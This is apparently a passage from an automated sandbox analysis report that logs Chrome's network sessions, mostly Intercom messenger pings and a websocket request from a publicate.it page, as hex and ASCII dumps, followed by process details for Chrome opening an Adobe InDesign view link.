                                                                                                                                                                                                        2024-08-30 16:16:32 UTC1418INData Raw: ba 2b 4c b3 11 ea 38 06 d1 50 20 ed ed f0 26 53 91 92 70 b7 e5 aa 3b 71 34 0b ce 64 41 30 cd 19 21 a8 b9 89 dd d9 d9 89 97 12 be 61 79 be 45 2a f1 f0 95 57 3b d8 df 0f 19 39 fd 15 c0 84 17 ee 02 58 b0 12 70 e8 80 47 e7 af 2a 1f f9 12 83 63 db 0a a2 31 8b 4f f2 dd 4b 2f c7 38 29 ec 88 25 f5 e1 2c 12 5c 8f 85 e1 33 8a e2 82 e5 e1 b6 46 bb bb a9 8e bc 2f fd 9c 63 2a 3a 2f ca 5c b4 b3 28 d5 2f 1a 55 bf 50 4a 97 52 62 1a fd e1 be e8 53 32 05 49 75 31 13 60 50 21 87 02 bc 26 af a0 c6 3b 5e 64 15 fa b4 02 fc a4 e8 dd fa 07 06 4b 51 6b 48 ee 2a 5d 96 14 e6 b0 6b 57 3d e2 55 2f 02 50 95 56 3d 62 49 67 75 05 f3 ed 18 eb 8b 24 ac 10 68 f0 b1 3a 4c a1 e3 8b 45 ee f9 25 1e 37 16 3d d3 de 82 d3 5d 4a 78 1c d2 0f e3 98 c9 5e 51 31 f8 12 c4 84 a2 39 3a ab 90 ec c8 83 0a
                                                                                                                                                                                                        Data Ascii: +L8P &Sp;q4dA0!ayE*W;9XpG*c1OK/8)%,\3F/c*:/\(/UPJRbS2Iu1`P!&;^dKQkH*]kW=U/PV=bIgu$h:LE%7=]Jx^Q19:
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC16384INData Raw: 2d 5d 18 17 17 16 5c 1b 2c 9a 71 fe da ef ab 1b f7 f1 96 ac 45 1b 61 93 a9 01 17 d2 a0 3a bf b4 2a ed d3 18 68 e2 9e 77 17 ca 34 71 54 78 85 29 03 7a 00 ef 57 4d e9 02 6d 57 89 f0 e5 a2 41 aa c1 af f2 1e 36 ea 19 46 70 30 a7 62 cb 27 78 99 ad 98 18 c3 9b 8f f1 1b dd 26 a3 2e d4 50 17 e5 7e 10 3e 8a 72 58 78 08 57 e0 8b 5a 86 07 e9 f4 cb bf 07 18 39 5f ab 45 14 b2 7b 4d 56 11 cf e4 f7 88 1e 48 21 5e 14 59 2f fc 40 79 96 fe 27 23 ab 86 72 2a bd be 4e b8 8c e4 34 6c 96 99 81 96 db 80 28 b7 1b 74 b0 df 2c 68 40 b0 0b 77 6b 72 c9 41 02 93 ae c0 f7 56 7c dc 97 f0 eb 94 7f 81 9d b9 5b db aa f5 59 db 5f eb 07 e8 5c 31 5f 33 7d ec 72 0d f1 eb 6b f3 43 57 7f 40 7c 4c 1b 39 9a d9 81 3a 7c ad 65 8d 36 12 87 75 bc d4 7a 5e f3 41 d5 4f 61 9a f8 6b c8 62 1f 4a 17 ea f8
                                                                                                                                                                                                        Data Ascii: -]\,qEa:*hw4qTx)zWMmWA6Fp0b'x&.P~>rXxWZ9_E{MVH!^Y/@y'#r*N4l(t,h@wkrAV|[Y_\1_3}rkCW@|L9:|e6uz^AOakbJ


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        147192.168.2.54994452.87.4.74436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:31 UTC598OUTPOST /messenger/web/ping HTTP/1.1
                                                                                                                                                                                                        Host: api-iam.intercom.io
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 513
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:31 UTC513OUTData Raw: 61 70 70 5f 69 64 3d 63 69 72 6c 78 71 30 64 26 76 3d 33 26 67 3d 35 33 32 34 61 36 37 34 64 35 36 32 63 64 62 39 34 61 62 30 31 66 31 61 63 33 33 64 37 62 63 33 65 31 66 38 31 66 65 36 26 73 3d 36 31 37 34 36 66 32 64 2d 36 32 62 66 2d 34 34 61 32 2d 61 38 64 36 2d 64 61 37 62 34 32 35 64 66 34 64 31 26 72 3d 26 70 6c 61 74 66 6f 72 6d 3d 77 65 62 26 69 6e 73 74 61 6c 6c 61 74 69 6f 6e 5f 74 79 70 65 3d 6a 73 2d 73 6e 69 70 70 65 74 26 49 64 65 6d 70 6f 74 65 6e 63 79 2d 4b 65 79 3d 35 63 31 30 31 62 33 36 33 61 34 31 64 34 38 30 26 69 6e 74 65 72 6e 61 6c 3d 25 37 42 25 37 44 26 69 73 5f 69 6e 74 65 72 73 65 63 74 69 6f 6e 5f 62 6f 6f 74 65 64 3d 66 61 6c 73 65 26 70 61 67 65 5f 74 69 74 6c 65 3d 50 75 62 6c 69 63 61 74 65 25 32 30 25 37 43 25 32 30 48
                                                                                                                                                                                                        Data Ascii: app_id=cirlxq0d&v=3&g=5324a674d562cdb94ab01f1ac33d7bc3e1f81fe6&s=61746f2d-62bf-44a2-a8d6-da7b425df4d1&r=&platform=web&installation_type=js-snippet&Idempotency-Key=5c101b363a41d480&internal=%7B%7D&is_intersection_booted=false&page_title=Publicate%20%7C%20H
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC966INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:32 GMT
                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                        Cache-Control: max-age=0, private, must-revalidate
                                                                                                                                                                                                        Access-Control-Allow-Origin: https://publicate.it
                                                                                                                                                                                                        Vary: Accept,Accept-Encoding
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556952; includeSubDomains; preload
                                                                                                                                                                                                        Access-Control-Expose-Headers: x-request-id
                                                                                                                                                                                                        X-Intercom-Version: f784e049ac7d79a9598063471da9ab8564abba4c
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Request-Queueing: 1000
                                                                                                                                                                                                        X-Request-Id: 00047jvp5heeirm8ak10
                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Idempotency-Key, X-INTERCOM-APP, X-INTERCOM-PAGE-TITLE, X-INTERCOM-USER-DATA
                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                        ETag: W/"d13a65b24a77b8934ff0ba05c63a57fa"
                                                                                                                                                                                                        X-Runtime: 0.277840
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        x-ami-version: ami-099ad2298f9ad38b6
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC3183INData Raw: 63 36 38 0d 0a 7b 22 61 70 70 22 3a 7b 22 6e 61 6d 65 22 3a 22 50 75 62 6c 69 63 61 74 65 22 2c 22 61 75 64 69 6f 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 73 68 6f 77 5f 70 6f 77 65 72 65 64 5f 62 79 22 3a 74 72 75 65 2c 22 74 65 61 6d 5f 69 6e 74 72 6f 22 3a 22 57 65 6c 63 6f 6d 65 20 74 6f 20 50 75 62 6c 69 63 61 74 65 2c 20 68 6f 77 20 63 61 6e 20 77 65 20 68 65 6c 70 3f 22 2c 22 74 65 61 6d 5f 67 72 65 65 74 69 6e 67 22 3a 22 48 69 20 74 68 65 72 65 20 f0 9f 91 8b 22 2c 22 6d 65 73 73 65 6e 67 65 72 5f 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 62 61 63 6b 67 72 6f 75 6e 64 2d 31 34 22 2c 22 65 78 70 65 63 74 65 64 5f 72 65 73 70 6f 6e 73 65 5f 64 65 6c 61 79 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 5f 6b 65 79 22 3a 22 61 5f 66 65 77 5f 68 6f 75 72 73
                                                                                                                                                                                                        Data Ascii: c68{"app":{"name":"Publicate","audio_enabled":true,"show_powered_by":true,"team_intro":"Welcome to Publicate, how can we help?","team_greeting":"Hi there ","messenger_background":"background-14","expected_response_delay_translation_key":"a_few_hours
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC1755INData Raw: 36 64 34 0d 0a 69 6e 74 65 72 63 6f 6d 63 64 6e 2e 63 6f 6d 2f 69 2f 6f 2f 33 30 34 34 39 36 2f 39 62 33 35 65 31 34 65 64 36 38 35 33 33 30 36 66 63 37 38 34 62 38 63 2f 35 64 65 62 61 31 37 34 63 32 31 66 33 63 30 61 66 39 37 38 30 64 62 35 34 64 39 66 65 30 32 63 2e 70 6e 67 22 2c 22 73 68 6f 77 5f 61 76 61 74 61 72 73 22 3a 74 72 75 65 2c 22 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 22 3a 7b 22 66 6f 72 65 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 66 66 66 66 66 66 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 30 30 30 30 30 30 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 6f 70 61 63 69 74 79 22 3a 30 2e 35 7d 2c 22 74 65 78 74 5f 63 6f 6c 6f 72 5f 74 79 70 65 22 3a 22 64 61 72 6b 22 7d 2c 22 68 65 61 64 65 72 5f 65 78 70 61 6e 64
                                                                                                                                                                                                        Data Ascii: 6d4intercomcdn.com/i/o/304496/9b35e14ed6853306fc784b8c/5deba174c21f3c0af9780db54d9fe02c.png","show_avatars":true,"close_button":{"foreground_color":"#ffffff","background_color":"#000000","background_opacity":0.5},"text_color_type":"dark"},"header_expand
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        148192.168.2.54994634.237.73.954436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:32 UTC679OUTGET /pubsub/5-2VrTcJ-wReFxxSsvN27p3l1l-rfQjhxEa0K_rcpidI_YYfbgqGBaXudDoBZfnBOD-yT-ZZ7mQ1OR91C6MrHx-21kDMXCDQnf8S3-?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor HTTP/1.1
                                                                                                                                                                                                        Host: nexus-websocket-a.intercom.io
                                                                                                                                                                                                        Connection: Upgrade
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Upgrade: websocket
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Sec-WebSocket-Key: Q0aP9KozPyLlmSCTR7OBOw==
                                                                                                                                                                                                        Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        149192.168.2.54994752.87.4.74436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:33 UTC598OUTPOST /messenger/web/ping HTTP/1.1
                                                                                                                                                                                                        Host: api-iam.intercom.io
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 626
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://publicate.it
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:33 UTC626OUTData Raw: 61 70 70 5f 69 64 3d 63 69 72 6c 78 71 30 64 26 76 3d 33 26 67 3d 35 33 32 34 61 36 37 34 64 35 36 32 63 64 62 39 34 61 62 30 31 66 31 61 63 33 33 64 37 62 63 33 65 31 66 38 31 66 65 36 26 73 3d 36 31 37 34 36 66 32 64 2d 36 32 62 66 2d 34 34 61 32 2d 61 38 64 36 2d 64 61 37 62 34 32 35 64 66 34 64 31 26 72 3d 26 70 6c 61 74 66 6f 72 6d 3d 77 65 62 26 69 6e 73 74 61 6c 6c 61 74 69 6f 6e 5f 74 79 70 65 3d 6a 73 2d 73 6e 69 70 70 65 74 26 49 64 65 6d 70 6f 74 65 6e 63 79 2d 4b 65 79 3d 31 30 39 63 61 32 61 33 63 34 62 35 64 66 63 36 26 69 6e 74 65 72 6e 61 6c 3d 25 37 42 25 37 44 26 69 73 5f 69 6e 74 65 72 73 65 63 74 69 6f 6e 5f 62 6f 6f 74 65 64 3d 66 61 6c 73 65 26 70 61 67 65 5f 74 69 74 6c 65 3d 50 75 62 6c 69 63 61 74 65 25 32 30 25 37 43 25 32 30 48
                                                                                                                                                                                                        Data Ascii: app_id=cirlxq0d&v=3&g=5324a674d562cdb94ab01f1ac33d7bc3e1f81fe6&s=61746f2d-62bf-44a2-a8d6-da7b425df4d1&r=&platform=web&installation_type=js-snippet&Idempotency-Key=109ca2a3c4b5dfc6&internal=%7B%7D&is_intersection_booted=false&page_title=Publicate%20%7C%20H
                                                                                                                                                                                                        2024-08-30 16:16:33 UTC963INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:33 GMT
                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                        Cache-Control: max-age=0, private, must-revalidate
                                                                                                                                                                                                        Access-Control-Allow-Origin: https://publicate.it
                                                                                                                                                                                                        Vary: Accept,Accept-Encoding
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31556952; includeSubDomains; preload
                                                                                                                                                                                                        Access-Control-Expose-Headers: x-request-id
                                                                                                                                                                                                        X-Intercom-Version: f784e049ac7d79a9598063471da9ab8564abba4c
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        X-Request-Queueing: 0
                                                                                                                                                                                                        X-Request-Id: 00064cr0p33or56jlbcg
                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Idempotency-Key, X-INTERCOM-APP, X-INTERCOM-PAGE-TITLE, X-INTERCOM-USER-DATA
                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                        Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                        ETag: W/"00072c40059441b508ddacdb2cfb10a8"
                                                                                                                                                                                                        X-Runtime: 0.226373
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                        x-ami-version: ami-099ad2298f9ad38b6
                                                                                                                                                                                                        2024-08-30 16:16:33 UTC4865INData Raw: 31 32 66 39 0d 0a 7b 22 61 70 70 22 3a 7b 22 6e 61 6d 65 22 3a 22 50 75 62 6c 69 63 61 74 65 22 2c 22 61 75 64 69 6f 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 73 68 6f 77 5f 70 6f 77 65 72 65 64 5f 62 79 22 3a 74 72 75 65 2c 22 74 65 61 6d 5f 69 6e 74 72 6f 22 3a 22 57 65 6c 63 6f 6d 65 20 74 6f 20 50 75 62 6c 69 63 61 74 65 2c 20 68 6f 77 20 63 61 6e 20 77 65 20 68 65 6c 70 3f 22 2c 22 74 65 61 6d 5f 67 72 65 65 74 69 6e 67 22 3a 22 48 69 20 74 68 65 72 65 20 f0 9f 91 8b 22 2c 22 6d 65 73 73 65 6e 67 65 72 5f 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 62 61 63 6b 67 72 6f 75 6e 64 2d 31 34 22 2c 22 65 78 70 65 63 74 65 64 5f 72 65 73 70 6f 6e 73 65 5f 64 65 6c 61 79 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 5f 6b 65 79 22 3a 22 61 5f 66 65 77 5f 68 6f 75 72
                                                                                                                                                                                                        Data Ascii: 12f9{"app":{"name":"Publicate","audio_enabled":true,"show_powered_by":true,"team_intro":"Welcome to Publicate, how can we help?","team_greeting":"Hi there ","messenger_background":"background-14","expected_response_delay_translation_key":"a_few_hour
                                                                                                                                                                                                        2024-08-30 16:16:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                        Start time:12:15:27
                                                                                                                                                                                                        Start date:30/08/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                        Start time:12:15:30
                                                                                                                                                                                                        Start date:30/08/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                        Start time:12:15:32
                                                                                                                                                                                                        Start date:30/08/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1"
                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                        Start time:12:17:01
                                                                                                                                                                                                        Start date:30/08/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6596 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                        Start time:12:17:01
                                                                                                                                                                                                        Start date:30/08/2024
                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        No disassembly